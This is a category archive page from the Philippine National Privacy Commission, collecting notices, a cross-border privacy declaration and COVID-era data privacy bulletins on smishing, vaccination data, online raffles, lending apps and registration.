Category Archive: Uncategorized
-
NPC and INAI Hold Transition Meeting for GPA fee-funded Secretariat
Comments Off on NPC and INAI Hold Transition Meeting for GPA fee-funded SecretariatMexico City, Mexico - The National Privacy Commission (NPC) of the Philippines convened with the Mexico’s Instituto Nacional de Transparencia, Acceso a la Información y Protección de Datos Personales (INAI) (National Institute for Transparency, Access to Information, and Personal Data Protection of México) on 20-21 January 2025, for a transition meeting marking a significant milestone in global data privacy governance.
During the two-day meeting, discussions focused on NPC’s assumption of its role as the first-ever fee-funded Secretariat of the Global Privacy Assembly (GPA).
The GPA is an international forum for data protection and privacy authorities, regulatory agencies, and other stakeholders, primarily to exchange best practices and regulatory approaches. INAI served as the Chair and Secretariat of GPA until October 2024. INAI Served as the incumbent GPA chair and secretariat until the transition of these roles to the authorities of Bulgaria as chair, and the Philippines as the secretariat. The transition meeting between NPC and INAI facilitated the exchange of insights and experiences between the two data protection and privacy authorities wherein INAI shared to NPC its knowledge and practices in leading and assisting the GPA.
In his opening remarks, Privacy Commissioner Atty. John Henry D. Naga acknowledged INAI’s invaluable contributions and dedicated service as GPA Secretariat. He emphasized, “We have big shoes to fill, but I am confident that through your cooperation, NPC will be able to continue the efforts to support the Assembly and its Executive Committee. We are determined to successfully and effectively fulfill the duties bestowed to us by the Assembly. To do that, we need the expertise and assistance of INAI, especially in providing vital information that the Secretariat work entails.”
INAI’s Commissioner Josefina Román Vergara highlighted the importance of ensuring a seamless transition and effective preparation for the responsibilities of the GPA Secretariat. She stated, “This meeting is an opportunity to provide insights, share best practices and equip the new secretariat with necessary tools and knowledge to undertake the responsibilities associate with the new role as GPA secretariat. This collaboration will strengthen the share commitment of upholding privacy and data protection standards globally.”
INAI’s Director General for International Affairs Juan Manuel Mota Perales and INAI’s Director of International Data Affairs Mariana Gómez led the transition meeting and successfully facilitated the logistical, operational, and substantive tasks related to assembly governance and information governance, including managing the Secretariat’s email, website, and social media channels.
INAI’s Commissioner President Adrián Alcalá Méndez and other officials from NPC and INAI also participated in the GPA transition meeting.
###
-
Announcement regarding the submission of Personal Data Breach Notifications (PDBN) and Annual Security Incident Reports (ASIR)
Comments Off on Announcement regarding the submission of Personal Data Breach Notifications (PDBN) and Annual Security Incident Reports (ASIR)All Personal Data Breach Notifications (PDBN) and Annual Security Incident Reports (ASIR) shall be submitted through the Data Breach Notification Management System (DBNMS) online platform (https//dbnms.privacy.gov.ph). Submissions through email, personal filing, ordinary mail, licensed courier service, and any other mode of physical submission shall NOT be considered as valid.
The deadline for the submission of ASIRs for the years 2018 to 2021 is on 31 October 2022.
For 2022 ASIRs, the DBNMS shall accept submissions from 1 January 2023 to 31 March 2023.
To guide you in navigating the DBNMS, please watch the videos below:
- How to create a DBNMS account
- How to submit a Personal Data Breach Notification report
- How to comply with the required documents and information
- How to submit an Annual Security Incident Report
For concerns relating to the system, email us at [email protected].
Compliance and Monitoring Division
-
Announcement regarding the submission of Personal Data Breach Notifications (PDBN) and Annual Security Incident Reports (ASIR)
Comments Off on Announcement regarding the submission of Personal Data Breach Notifications (PDBN) and Annual Security Incident Reports (ASIR)All Personal Data Breach Notifications (PDBN) and Annual Security Incident Reports (ASIR) shall be submitted through the Data Breach Notification Management System (DBNMS) online platform (https//dbnms.privacy.gov.ph). Submissions through email, personal filing, ordinary mail, licensed courier service, and any other mode of physical submission shall NOT be considered as valid.
The deadline for the submission of ASIRs for the years 2018 to 2021 is on 31 October 2022.
For 2022 ASIRs, the DBNMS shall accept submissions from 1 January 2023 to 31 March 2023.
To guide you in navigating the DBNMS, please watch the videos below:
- How to create a DBNMS account
- How to submit a Personal Data Breach Notification report
- How to comply with the required documents and information
- How to submit an Annual Security Incident Report
For concerns relating to the system, email us at [email protected].
Compliance and Monitoring Division
-
NOTICE OF PUBLIC HEARING
Comments Off on NOTICE OF PUBLIC HEARINGNOTICE OF PUBLIC HEARING
Concerned organization, stakeholders, and other interested parties are invited to submit their comments/suggestions/opinions and other valuable inputs regarding the draft new registration circular to be adopted by the National Privacy Commission.
Please see attached NPC Circular for reference. click here
This Circular aims to replace NPC Circular 17-01, which, together with the new NPC Registration System, shall make it easy for personal information controllers, personal information processors, and individual professionals comply with the registration requirement of the Data Privacy Act of 2012.
Please send your comments/suggestions/opinions and other valuable inputs to [email protected] not later than 31 July 2022.
The Commission will conduct an online public hearing on 8 August 2022 from 1:30-3:30 PM. Interested participants who wish to join may send an email to the address provided above on or before 31 July 2022.
Thank you.
-
Global Cross-Border Privacy Rules (CBPR) Declaration
Comments Off on Global Cross-Border Privacy Rules (CBPR) DeclarationCanada, Japan, the Republic of Korea, the Philippines, Singapore, Chinese Taipei, and the United States of America, as current economies participating in the APEC CBPR System,
Recognising
that growing Internet connectivity and the digitisation of the global economy have resulted in the rapid increase in the collection, use, and transfer of data across borders, a trend that continues to accelerate;Conscious
that trusted cross-border data flows are indispensable—not just for big, multinational technology companies, but for companies across all sectors of the economy, and for micro, small- and medium-sized businesses, workers, and consumers as well;Believing
that cross-border data flows increase living standards, create jobs, connect people in meaningful ways, facilitate vital research and development in support of public health, foster innovation and entrepreneurship, and allow for greater international engagement;Acknowledging
that regulatory barriers threaten to undermine opportunities created by the digital economy at a time when companies are relying increasingly on digital technologies and innovations to continue business operations and recover economically;Recognising
the importance of strong and effective data protection and privacy in strengthening consumer and business trust in digital transactions;Acknowledging
the important contribution made by the Asia-Pacific Economic Cooperation (APEC) in developing the APEC CBPR System to foster cross border data flows and interoperability;Do hereby declare as follows:
- The establishment of a Global CBPR Forum to promote interoperability and help bridge different regulatory approaches to data protection and privacy;
-
The objectives of the Global CBPR Forum are to:
- establish an international certification system based on the APEC Cross Border Privacy Rules (CBPR) and Privacy Recognition for Processors (PRP) Systems;
- support the free flow of data and effective data protection and privacy through promotion of the Global CBPR and PRP Systems;
- provide a forum for information exchange and cooperation on matters related to the Global CBPR and PRP Systems;
- periodically review data protection and privacy standards of members to ensure Global CBPR and PRP program requirements align with best practices; and
- promote interoperability with other data protection and privacy frameworks.
SCOPE OF ACTIVITY
-
The Global CBPR Forum is expected to:
- promote expansion and uptake of the Global CBPR and PRP Systems globally to facilitate data protection and free flow of data;
- disseminate best practices for data protection and privacy and interoperability; and
- pursue interoperability with other data protection and privacy frameworks.
MODE OF OPERATION
-
Cooperation is intended to be based on:
- the principle of mutual benefit and a commitment to open dialogue and consensus-building, with equal respect for the views of all members;
- consultation and exchange of views among representatives of members, drawing upon research, analysis and policy ideas contributed by members and other relevant organisations; and
- active multistakeholder participation in appropriate activities.
PARTICIPATION
- Participation in the Global CBPR Forum is intended to be open, in principle, to those jurisdictions which accept the objectives and principles of the Global CBPR Forum as embodied in this Declaration.
- Decisions regarding future participation in the Global CBPR Forum should be made on the basis of a consensus of all members.
- Non-members may be invited to the meetings of the Global CBPR Forum upon such terms and conditions as may be determined by all members.
ORGANISATION
- Meetings of Global CBPR Forum members should be held at least biannually to determine the direction and nature of activities within the framework of this Declaration and decide on arrangements for implementation. Meetings can be held in person or remotely.
- Additional meetings may be convened as decided by all members.
FAQs
How is the Global CBPR Forum related to the Asia-Pacific Economic Cooperation (APEC) CBPR and Privacy Recognition for Processors (PRP) Systems?
The Global CBPR Forum intends to establish an international certification system based on the APEC CBPR and PRP Systems, but the system will be independently administered and separate from the APEC Systems. The founding members of the Global CBPR Forum will consult with Accountability Agents and certified companies in the APEC Systems to formally transition operations from APEC to the Global CBPR Forum and will provide at least 30 days’ notice to Accountability Agents.What if my business is currently certified or is interested in becoming certified in the APEC CBPR or the PRP Systems?
APEC CBPR and PRP certifications will continue to be provided through APEC-approved Accountability Agents until further notice. The founding members of the Global CBPR Forum that are currently participants in the APEC CBPR System plan to transition operations of the CBPR and PRP Systems from APEC to the Global CBPR Forum and will provide at least 30 days’ notice to Accountability Agents. All approved Accountability Agents and certified companies will automatically be recognized in the new Global CBPR Forum based on the same terms that they are recognized within the APEC CBPR and PRP Systems. Please contact your Accountability Agent for more information on the transition to the Global CBPR Forum.How can I participate in the Global CBPR Forum?
The Global CBPR Forum members welcome consultations with jurisdictions that accept the objectives and principles of the Global CBPR Forum to identify alignment with CBPR System requirements. -
NPC PHE Bulletin No. 21 Preventive Data Privacy Practices Against Smishing
Comments Off on NPC PHE Bulletin No. 21 Preventive Data Privacy Practices Against SmishingThe National Privacy Commission (NPC) has received reports of smishing where mobile users received unsolicited SMS messages allegedly due to the contact information they provided in COVID-19 contact tracing and health declaration forms.
The contents of these unsolicited messages reportedly include links that redirect to legitimate looking but fraudulent sites when clicked. These sites may steal users’ personal data, introduce mobile malware, and even commit fraud.
Smishing is a type of phishing attack that targets victims through mobile text messaging or SMS. Smishing attacks occur when threat actors send text messages to trick subscribers into clicking malicious websites.
One smishing scenario involves the activation of a dummy Facebook account. The text message sent to a user contains a code and a shortened link that, when clicked, binds the recipient’s mobile number to the dummy account.
Smishing can also be used in online shopping/delivery to trick unsuspecting victims who expect a product they purchased online. Clicking the shortened link will redirect the recipient to a website that prompts them to fill out their personal and banking information to complete the delivery.
The Commission highlights the importance of being vigilant and aware of cybersecurity attacks. “One of the best ways users can arm themselves against smishing attacks is to be aware of this kind of manipulation. Scrutinize the text messages you receive, especially if they come from an unknown number and request information about you. Be skeptical and don’t assume that every message you receive is genuine,” Privacy Commissioner Raymund E. Liboro said.
Recent data privacy and security advisory from the Commission’s Data Security and Technology Standards Division recommends steps on how users can protect themselves against smishing. This bulletin also reminds organizations to safeguard the personal data they process.
Good practice
a. For data subjects
-
- Do not click links of services you did not sign up for. Be cautious with shortened links. A URL shortening service is an online tool that allows users to create a short and unique website link. These URL shortening services may be used by threat actors to conceal their malicious links.
- Malicious links require an action from you, such as filling out online forms with your personal or financial information.
- Do not open in-app links. Change to the default browser of your mobile phone that opens links.
- Android OS and iOS smartphone users are advised to immediately block and report the unsolicited text messages they receive using the built-in spam feature in their SMS apps.
- Spam or junk messages generally refer to unsolicited messages in email, instant messaging, or SMS. Messages recognized by your mobile operating system or SMS app as “spam” or “junk” go to a separate folder.
- Disable “link previews” in the SMS app.
i. Block, filter, and report messages on iPhone (iOS: iMessage)
The Messages app blocks unwanted messages, filters messages from unknown senders, and reports spam or junk messages.
Block messages from a specific phone or number
1. In a conversation on Messages, tap the name or number at the top, then tap at the top right portion.
2. Tap info.
3. Scroll down and then tap Block, this Caller.
To view and manage your list of blocked contacts and phone numbers, go to Settings > Messages > Blocked Contacts.
Filter messages from unknown senders
Filtering messages from unknown senders turns off iMessage notifications from senders not in your contact list and moves the messages to the Unknown Senders tab in the Messages app.
1. Go to Settings > Messages.
2. Turn on Filter Unknown Senders.
Note: You cannot open any link in a message from an unknown sender until you add the sender to your contacts or reply to the message.
Report spam or junk messages
With iMessage, a message you receive from someone not in your contact list may be identified as possible spam or junk. You can report this type of message to Apple.
In the message, tap Report Junk, then tap Delete and Report Junk.
The sender’s information and the message are sent to Apple, and the message is permanently deleted from your device.
Note: Reporting the message as junk or spam does not prevent the sender from sending other messages, but you can block the number to stop receiving messages from the sender.
To report spam or junk messages you receive with SMS or MMS, contact your carrier.
ii. Report Spam and Blocking (Android OS: Google Messages)
When you report a chat as spam, you can block the sender and move it to your “Spam & blocked” folder.
1. On your Android phone or tablet, open the Messages app .
2. Touch and hold the chat you want to report.
3. Tap Block Report spam OK.
You can also open the chat to report it as spam. From the chat, tap More Details Block & report spam Report spam OK.
Note: The contact will be reported as spam, and the chat will be moved to your “Spam & blocked” folder. You can report spam without blocking the contact.
Report spam in a group message
When you report spam in a group message, the spammer is reported, and the message is moved to your “Spam & blocked” folder.
1. On your Android phone or tablet, open the Messages app.
2. Open the chat you want to report.
3. Tap More Group details Report spam.
4. Tap Report spam.
Remove a spam report
You can remove spam reports after submitting them.
1. On your Android phone or tablet, open the Messages app .
2. Tap More Spam & blocked.
3. Select a chat.
4. Tap Not spam. If you want to unblock a contact or number which you blocked, tap Unblock. If you tap Unblock, the chat will be removed from the "Spam & blocked" folder.
b. For personal information controllers and personal information processors
Efforts to control the spread of COVID-19 prompted an increase in the collection of personal data through contact tracing and/or health declaration forms in establishments and workplaces.
Consequently, these establishments must ensure the protection of the personal data that they are collecting.
Recommended measures are as follows:
- Apply access controls to the database of data collected physically and electronically.
- Implement appropriate security measures in the contact tracing applications (both web and mobile).
- Process personal information, especially mobile numbers contained in the contact tracing and health declaration forms, only to alleviate the risk of COVID-19 infection and not for any other purpose.
- Ensure that health declaration forms or log sheets are not in a matrix form where visitors can see one another’s personal information. For further guidance, refer to
***
-
-
NPC PHE Bulletin No. 20 Processing of vaccination cards for promos, raffles, or discounts
Comments Off on NPC PHE Bulletin No. 20 Processing of vaccination cards for promos, raffles, or discountsThe National Privacy Commission (NPC) received concerns about the collection of copies of COVID-19 vaccination cards by certain delivery companies, which are also personal information controllers (PICs), wishing to reward vaccinated individuals by offering them promos, raffles, or discounts.
We laud these gestures as part of the ongoing initiative to encourage all eligible individuals to be vaccinated against COVID-19. But we remind all PICs engaged in the personal data processing activity of the following:
- Vaccination cards contain sensitive personal information such as the vaccinee’s age, date of birth, and health information.
- In processing sensitive personal information, consent may be a lawful basis. For consent to be valid, it must be freely given, specific, informed, and an indication of will. This means that the vaccinee should explicitly agree to the collection and processing of his or her vaccine card. Consent must also be evidenced by written, electronic or recorded means.
- A privacy notice must be provided to sufficiently inform the vaccinees wishing to avail themselves of the promos, raffles, or discounts on the details of the processing of their personal data and their rights as data subjects, among other necessary information, for PICs to demonstrate transparency.
- The use of the vaccine card must also be limited to the purpose for which it was collected, i.e., availing oneself of the promos, raffles, or discounts. It shall not be used for further processing, such as profiling, automated decision making, or for other purposes incompatible with the declared and specified purpose.
- The health information of the data subjects must be adequately secured. PICs must adopt measures to protect copies of the vaccine cards and shall be accountable for their processing.
- The vaccine cards should never be posted by PICs on public platforms. Such unauthorized disclosure may be punishable under the Data Privacy Act of 2012 and other applicable laws.
- Copies of the vaccine cards must be retained only for as long as necessary for the fulfillment of the purpose. These must be disposed of in a secure manner – hardcopies must be shredded properly while softcopies must be deleted or overwritten in a manner that ensures that the stored copy of the vaccine cards are permanently and irreversibly destroyed and beyond recovery.
We also remind all data subjects to report any data privacy concern to the NPC. We may be reached at [email protected].
***
-
Joint press statement of the National Privacy Commission, Fintech Alliance.PH, Philippine Finance Association, and the non-bank financing sector against illegal practices of online lending apps
Comments Off on Joint press statement of the National Privacy Commission, Fintech Alliance.PH, Philippine Finance Association, and the non-bank financing sector against illegal practices of online lending appsThe National Privacy Commission (NPC) is ardent in promoting the ethical and responsible treatment of the citizens’ personal data. We, along with the Philippine Finance Association members, the Fintech Alliance.ph members, and the non-bank financing institutions, strongly condemn the practice of some online lending platforms in harvesting excessive information without legitimate purpose through the use of unreasonable and unnecessary apps permissions including saving and storing their clients’ contact list and photo gallery ostensibly to evaluate their creditworthiness. Such practice is unnecessary because an applicant’s creditworthiness may be determined through other lawful and reasonable means.
We likewise reiterate our appeal to non-compliant operators of online lending apps to refrain from exploiting borrowers by using the borrowers’ personal data to shame and coerce them into paying their loans through unauthorized and unfair use of their personal data. Now more than ever, business operators must act with consideration and a strong moral code as the whole world struggles with the exhaustive toll of the COVID-19 pandemic. We remind concerned digital lending players to strictly adhere to the Code of Conduct and Code of Ethics as well as the Code of Collection Standards and Ethics that the FinTech Alliance.ph and the Philippine Finance Association have established and standardized in the industry to ensure strict compliance while promoting consumer protection.
Entities are obligated to comply with the Data Privacy Act of 2012 and related laws when processing the personal data of data subjects. Reference may also be made to NPC Circular 20-01 which provides guidelines for processing personal data for loan-related transactions.
We call on these non-compliant lending entities to use lawful and reasonable methods in evaluating loan applicants' creditworthiness as well as in debt collection practices by upholding data subject rights without resorting to unfair debt collection practices and harassment of borrowers such as the use of insults or profane language, violent threats or false representation and unnecessarily exposing their borrowers’ personal data to unauthorized persons.
Lending companies must bear in mind that they are always accountable for the personal data under their control or custody. Thus, they are obliged to adopt and implement reasonable policies in handling the personal data of borrowers
***
-
PROPOSED SUSPENSION OF THE PROVISIONS OF THE DATA PRIVACY ACT OF 2012 FOR CONTACT TRACING
Comments Off on PROPOSED SUSPENSION OF THE PROVISIONS OF THE DATA PRIVACY ACT OF 2012 FOR CONTACT TRACING -
NPC PHE Bulletin No. 19: Personal data processing for the COVID-19 vaccination program
Comments Off on NPC PHE Bulletin No. 19: Personal data processing for the COVID-19 vaccination programThe National Privacy Commission (NPC) received various reports on the harmful data collection practices apparently for the vaccination program of the government.
For instance, senior citizens were required by a personnel of a local government unit (LGU) to submit their personal data through the comments section of a social media platform if they wish to receive the vaccine. Such comments are publicly accessible and therefore susceptible to further processing and use for unauthorized purposes.
On the other hand, some companies expressed uncertainty as to the requirement to submit personal data of their employees who are willing to be vaccinated and/or may be qualified to avail of the vaccine, on the mistaken belief that this will already be automatically construed as a violation of the Data Privacy Act of 2012 (DPA).
We understand that the above efforts to collect personal data may be related with the masterlisting requirements under the following:
- Philippine National Deployment and Vaccination Plan for COVID-19 Vaccines (Plan);
- Department of Health (DOH) Department Memorandum (DM) No. 2021 – 0099 or the Interim Omnibus Guidelines for the Implementation of the National Vaccine Deployment Plan for COVID-19;
- Republic Act No. 11525 or the COVID-19 Vaccination Program Act of 2021; and
- Implementing Rules and Regulations (IRR) of RA No. 11525 issued by the DOH and the National Task Force Against COVID-19 through Joint Administrative Order (JAO) No. 2021-0001.
We remind all personal information controllers (PICs), whether in the government or the private sector, that there is a proper manner to accomplish this masterlisting activity without unnecessarily compromising personal data and infringing on the data privacy rights of individuals wanting to be vaccinated against COVID-19.
While the NPC does not intend to offer any opinion involving medical or clinical decision-making in relation to the vaccine roll-out, we issue this Bulletin to provide additional guidance on the vaccination-related personal data processing and a reiteration of our stance that the DPA does not operate to hinder the pandemic response:
1. We emphasize that there are existing laws and regulations which provide for the operational guidelines in the implementation of the nationwide vaccine deployment vaccination program. There are prescribed processes for masterlisting intended vaccinees which should be strictly followed. Government agencies and the private sector should not deviate from these standard processes.
2. The proper preparation and submission of masterlists, using the prescribed methods and formats in accordance with the Plan and laws and related DOH issuances, by required institutions such as health facilities and the LGUs, are allowed under the DPA. The DPA should not be used as an excuse for failing to comply with the masterlisting requirements.
3. Health facilities and LGUs are mandated to securely gather the necessary personal data as determined by the DOH and any other proper government authorities and submit the same through the COVID-19 Vaccine Information Management System – Immunization Registry (VIMS-IR), the official platform for master listing and preregistration of individuals for COVID-19 vaccination. As mentioned in the Plan and the DOH DM, external systems may be used to submit the necessary information following the prescribed minimum required data fields for vaccine registration systems.
4. LGUs and other PICs involved should endeavor to prepare a privacy notice which explains in clear and plain language to the data subjects the details of the vaccination-related personal data processing activities. Essentially, these privacy notices must be able to explain the purpose for collecting personal data, the legal basis for processing, that the personal data shall be stored in the VIMS-IR platform, their rights under the DPA, contact information of the pertinent data protection officers, among others.
5. We understand that consent will be obtained not only for the vaccination but also for personal data collection as well. Consent of the data subjects refers to any freely given, specific, informed indication of will, whereby the data subject agrees to the processing of his/her personal data and this should be evidenced by written, electronic or recorded means. Consent must be obtained prior to any processing of personal data. A data subject may also specifically authorize another person to give consent on his or her behalf. The requirement of evidence of such consent also applies in this situation.
6. The declared purpose of the processing of personal data is to establish a masterlist of eligible population for vaccination to enable health authorities to decide on who can be safely vaccinated from a clinical perspective. Personal data collected for this purpose must not be further processed for other purposes which are incompatible with the specified and declared purpose.
7. We understand that after immunization, the LGUs as well as the private sector are likewise required to submit the masterlist of persons who have already been inoculated through the VIMS-IR, subject to further guidance as may be issued by the DOH and the Department of Information and Communications Technology (DICT). This is likewise recognized under the DPA and should be complied with.
8. On the issuance of the COVID-19 Vaccine Cards, we understand that a standard form shall be used containing the necessary information prescribed by the DOH. While the vaccine cards shall remain accessible through printed cards issued by the health facilities or LGUs in line with the printing standards set by the DOH, the intention is to have digital vaccine cards for which systems and applications will be developed by the DOH, through the DICT. With this, privacy by design should be considered in the development of these digital systems.
9. We remind all PICs involved in the issuance of these vaccine cards, whether in paper or digital format, that these should never be posted in public platforms.
10. Finally, reasonable, and appropriate safeguards (physical, organizational, and technical security measures) must be implemented by the LGUs and other PICs involved to ensure the protection of personal data against any unlawful processing, alteration, disclosure, or destruction. We remind all PICs that the minimum required data for masterlisting is a comprehensive record of a potential vaccinee containing sensitive personal information. The same should be treated with utmost confidentiality and should not be posted in public platforms.
a. Only disclose patient data to proper authorities and in appropriate areas. Refrain from discussing patient data in public areas where unauthorized parties may pick uppersonal data, unless when providing treatment under compelling circumstances. In addition, when discussing over the phone, confirm the identity of the person first and check whether he or she is authorized to receive such information.
b. Protect the computer display from unauthorized or accidental viewing. Prevent the accidental viewing and disclosure of data using privacy screens. If a privacy screen is not readily available or practical, place computer monitors inside secluded cubicles or angle them in such way that minimizes the chance of any unauthorized or accidental viewing by unauthorized individuals. Computers must be locked with a password whenever the authorized user leaves the workstation.
c. Lock storage media away when not in use. If the use of portable storage media (such as USB flash drives or external hard drives) to store patient data is unavoidable, ensure that the files are encrypted, and password protected. Also, make sure they are kept secure when working in public places and not left absentmindedly on desks, counters, in conference rooms, and other common areas where they may be accessed by unauthorized individuals.
d. Ensure that patient data are encrypted, both in-transit and at rest. Electronic copies of patient data must be protected in the same extent that physical files and storage media containing patient data are secured. Encrypting patient data both in-transit and at rest ensures that the files are locked and only accessible to authorized persons.
e. Communicate securely. Security features of systems and networks must ensure that data can be transmitted both internally and externally without malicious or unauthorized users intercepting or harmfully affecting transmission and reception of data. The application of encryption technology (including measures) will protect transmissions from interception and exploitation of sessions, thereby increasing the security and stability of communications. Also, choose a secure platform for team collaboration and patient communication. For further protection, ensure that the documents are encrypted with a password of sufficient strength. The password must be sent via a separate channel like SMS/text. It is likewise advised that apart from setting a strong password, use a second-factor authenticator whenever logging into accounts.
f. Conduct independent security audits and tests. After the development of data processing systems (e.g., websites, databases, and e-health systems), they must be subjected to independent security and privacy tests including, but not limited to, Source Code Audits, Vulnerability Assessment and Penetration Testing (VAPT), and Privacy Impact Assessment (PIA). This is to validate your system implementation and find out if your data processing systems are vulnerable to common and latest threats/vulnerabilities.
g. Strengthen your systems against prominent web attacks. A well-structured system, including both the front-end and back-end, ensures the protection of your data against common web attacks. The vulnerabilities found in the conduct of audits and tests must be fixed first before the system is used further. Also, it is important to secure the communication between a user’s web browser and your site. This will add another layer of protection to your system.
h. Update your systems and its components. The security and privacy vulnerabilities yesterday may not be the same today. Make a conscious effort to continuously improve or update your systems and implement best practices in configuring or hardening them (e.g., database encryption at rest, encryption in transit, network access controls, data access controls, and audit logs). A web application firewall can be installed to deter Distributed Denial of Service (DDoS) attacks.
i. Back up your data. When conducting regular maintenance like a system update, upgrade, or configuration, ensure to run a full backup of your website periodically. It must follow your system documentation consistently and obtain a clearance from an accountable officer in your organization such as the Data Protection Officer (DPO). Online backups are also a convenient way to ensure an accessible copy of your website when the need arises. You may use the “3-2-1” strategy:
-
-
- i. 3 total copies of the data
-
-
-
- ii. 2 copies are local but on different mediums
-
-
-
- iii. 1 copy is offsite which may be geographically separated or in an online cloud computing platform
-
In an event of a ransomware, one should not give into the ransom demands of the perpetrator. Backups are the only guaranteed solution that will restore data.
j. Consider migrating to Cloud. Use of cloud computing services reduces capital expenses like housing and maintaining your own data centers with servers, storages and other ICT active components. In addition, it eliminates the tedious task of upholding the security of your infrastructure. Your cloud service provider does that for you. However, keep in mind that proper security and routine maintenance of your web application that runs in the cloud is your full responsibility.
k. Data Privacy as a priority. While we have competing priorities as of this point in time, compliance with the Data Privacy Act of 2012 must also be a priority to protect patient records. Data privacy must be integrated in the whole data lifecycle from start to finish, to ensure all data are securely created, retained, and securely destroyed at the end of the process. To secure that the data lifecycle is protected, end-to-end, the data lifecycle needs to be improved to effectively manage, creation, manage archiving, transport, and deletion of data. One can conduct a Privacy Impact Assessment to determine data privacy risks and a control framework to address those gaps in the data lifecycle.
l. Security Incident Management. LGU Health Departments, hospitals, clinics, and health care institutions as Personal Information Controllers must immediately notify NPC and affected data subject in case of a potential or actual personal data breach. The organization’s Data Protection Officer and/or Data Breach Response Team should immediately be alerted to swiftly respond and act on security incidents to prevent further disclosure of patient data.
###
-
NPC PHE Bulletin No. 18: Online Raffles and Other Games of Chance: Ensuring Proper Safeguards in the Collection of Personal Data
Comments Off on NPC PHE Bulletin No. 18: Online Raffles and Other Games of Chance: Ensuring Proper Safeguards in the Collection of Personal DataAs the country struggles with the pandemic and the limitations forced by the community quarantine, some enterprising businesses and organizations have offered to help individuals and families in need. From recent reports, this comes in the form of online raffles and other games of chance, where cash and/or livelihood assistance can be won instantly.
The National Privacy Commission (NPC) understands these efforts to help out. However, requiring participants to post their personal data online (e.g., names, selfies, addresses, contact numbers) in the comments section of various social media platforms, may lead to DANGERS SUCH AS STALKING, SCAMMING, ONLINE HARASSMENT, and many more.
With this, all businesses, organizations, and individuals who would like to collect personal information for purposes of raffles and giveaways are strongly urged to keep in mind the following practices:
- Be more cautious in creating contest mechanics and consider less privacy-intrusive means of collecting personal data.
- Instead of requiring the public posting of personal data, the mechanics may simply ask participants to like a post, comment an emoji, send a direct message, or other ways that will not necessitate public access to personal data.
- Data subjects may not be fully aware of, or concerned about, the possible consequences of posting personal data in public platforms.
To participants of online raffles and other games of chance, always think twice before sharing your personal data. If the contest mechanics is asking for excessive information about you, or if it obliges you to share information where others can effortlessly possess it, take that into consideration before joining.
The appeal of participating in such contests is undeniable but choose the ones that will not put your personal data on the line.
-
eRehistro: Account Creation and DPS Registration
Comments Off on eRehistro: Account Creation and DPS RegistrationPara sa EASY at CONVENIENT na pagregister sa platform, narito ang ilang mga bagay na dapat mong ihanda para sa pagregister sa eRehistro!
Sino-sino ang mga kailangang magregister sa eRehistro?
Ang mga bago at lumang rehistrong organisasyon at indibiduwal na nagpoproseso ng personal data, o ang tinatawag nating Personal Information Controllers (PICs) at Personal Information Processors (PIPs) ay dapat magregister gamit ang eRehistro. Ayon sa Section 5 ng NPC Circular 17-01 (https://www.privacy.gov.ph/npc-circular-17-01.../), ang mga halimbawa nito ay- Government Sector
- Financial Sector
- Telecommunication Sector
- BPO Sector
- Education Sector
- Health Sector
- Insurance Sector
- Retail and Manufacturing Sector
- Pharmaceutical Industry
- Maritime and Land-Based manning agencies
- Social media companies
- Tech Sector
- Transportation and logistics companies
- Tourism Sector
- Non-governmental Organizations
- Cooperatives
- Ano-ano ang mga kinokolektang personal data sa pag gawa ng account sa eRehistro?
Bilang pagsunod sa Principles of Proportionality at Transparency ng Data Privacy Act, kailangan mo lamang i-encode ang lahat ng mga sumusunod na iba pang personal data sa eRehistro Application Form:- Pangalan ng Head ng Organisasyon
- Email address ng Organisasyon
- Contact number ng Organisasyon
- Pangalan ng Data Protection Officer (DPO)
- Email address ng DPO
- Contact number ng DPO
- Magupload ng signature
- Kasarian ng DPO
- Pangalan ng indibiduwal na PIC
- Email address ng indibiduwal na PIC
- Contact number ng indibiduwal na PIC
- Government issued ID numbers ng indibiduwal na PIC
Pagkatapos ma-encode ang lahat ng hinihinging data, kailangang i-print, pirmahan at ipanotaryo ang eRehistro Application Form.
- Ano-anong dokumento ang kailangang ihanda para sa pag gawa ng ng account sa eRehistro?
Sa paggawa ng account at pagregister sa eRehistro, ito ang mga dokumentong dapat i-upload sa platform:- Board Resolution o Secretary’s Certificate na nag-aapoint sa inyong DPO
- Securities and Exchange Commission (SEC) o Department of Trade and Industry (DTI) o anumang katulad na dokumento na nagpapatunay ng existence ng organization
- Notarized eRehistro Application Form
- Ano-ano ang mga impormasyon na hihingin sa pag-accomplish ng registration ng Data Processing System (DPS)?
Upang mapaghandaan ang pagrerehistro ng inyong DPS, narito ang mga impormasyong kailangan i-encode sa eRehistro:- Pangalan ng Data Processing System
- Uri ng DPS (kung ito ay paper-based/ manual, electronic/automatic o pareho)
- Purpose ng DPS
- Kung ikaw ay PIC o PIP
- Kung ang DPS ay may fully automated decision making
- Kung ang DPS ay outsourced o subcontracted
- Categories ng data subject at categories ng data
- Bilang ng staff sa PIC/PIP’s data protection office
- Bilang ng recipients kung kanino nadisclose at maaring madisclose ang personal data
- Kung ito ay nililipat sa ibang entity sa labas ng Pilipinas
-
Ano ang mangyayari kapag hindi niregister ang DPS ng isang PIC o PIP?
Dahil ito ang last step ng registration, hindi makakakuha ng Certificate of Registration mula sa NPC ang PIC o PIP kapag hindi niregister ang lahat ng kanilang DPS.
Kung kulang naman ang nairehistrong DPS ng organisasyon, magiging isa ito sa mga konsiderasyon na titignan ng NPC sa pagsasagawa nito ng compliance checks at kapag nagkaroon ng security breaches. Maaari ring imbestigahan ito ng NPC sa hinaharap.
Kaya naman kumpletuhin na ang detalye ng inyong DPS upang mapadali ang pag-encode nito sa eRehistro!
-
NPC Statement on Reported Selling of Cashalo Users’ Personal Data
Comments Off on NPC Statement on Reported Selling of Cashalo Users’ Personal DataIt has come to the National Privacy Commission’s attention that client data from Cashalo is being reportedly sold on the dark web.
Rest assured that the Commission has already started investigating this matter. However, to avoid jeopardizing the investigation process, we will refrain from giving further details as of the moment.
We endeavor to determine the veracity of this privacy matter and timely apprise the public as more details come in.
Atty. Michael R. Santos
OIC-Chief
Complaints and Investigation Division -
NPC PHE BULLETIN No. 17: Update on the Data Privacy Best Practices in Online Learning
Comments Off on NPC PHE BULLETIN No. 17: Update on the Data Privacy Best Practices in Online LearningAs schools remain constrained to conduct blended learning in lieu of face-to-face classes due to the risks of the COVID-19 pandemic, various inquiries were received from stakeholders on the conduct of synchronous online classes and other related matters.
The National Privacy Commission, in its continuing efforts to provide responsive advice and guidance, underscores the need to balance effective teaching and learning online while upholding data privacy rights.
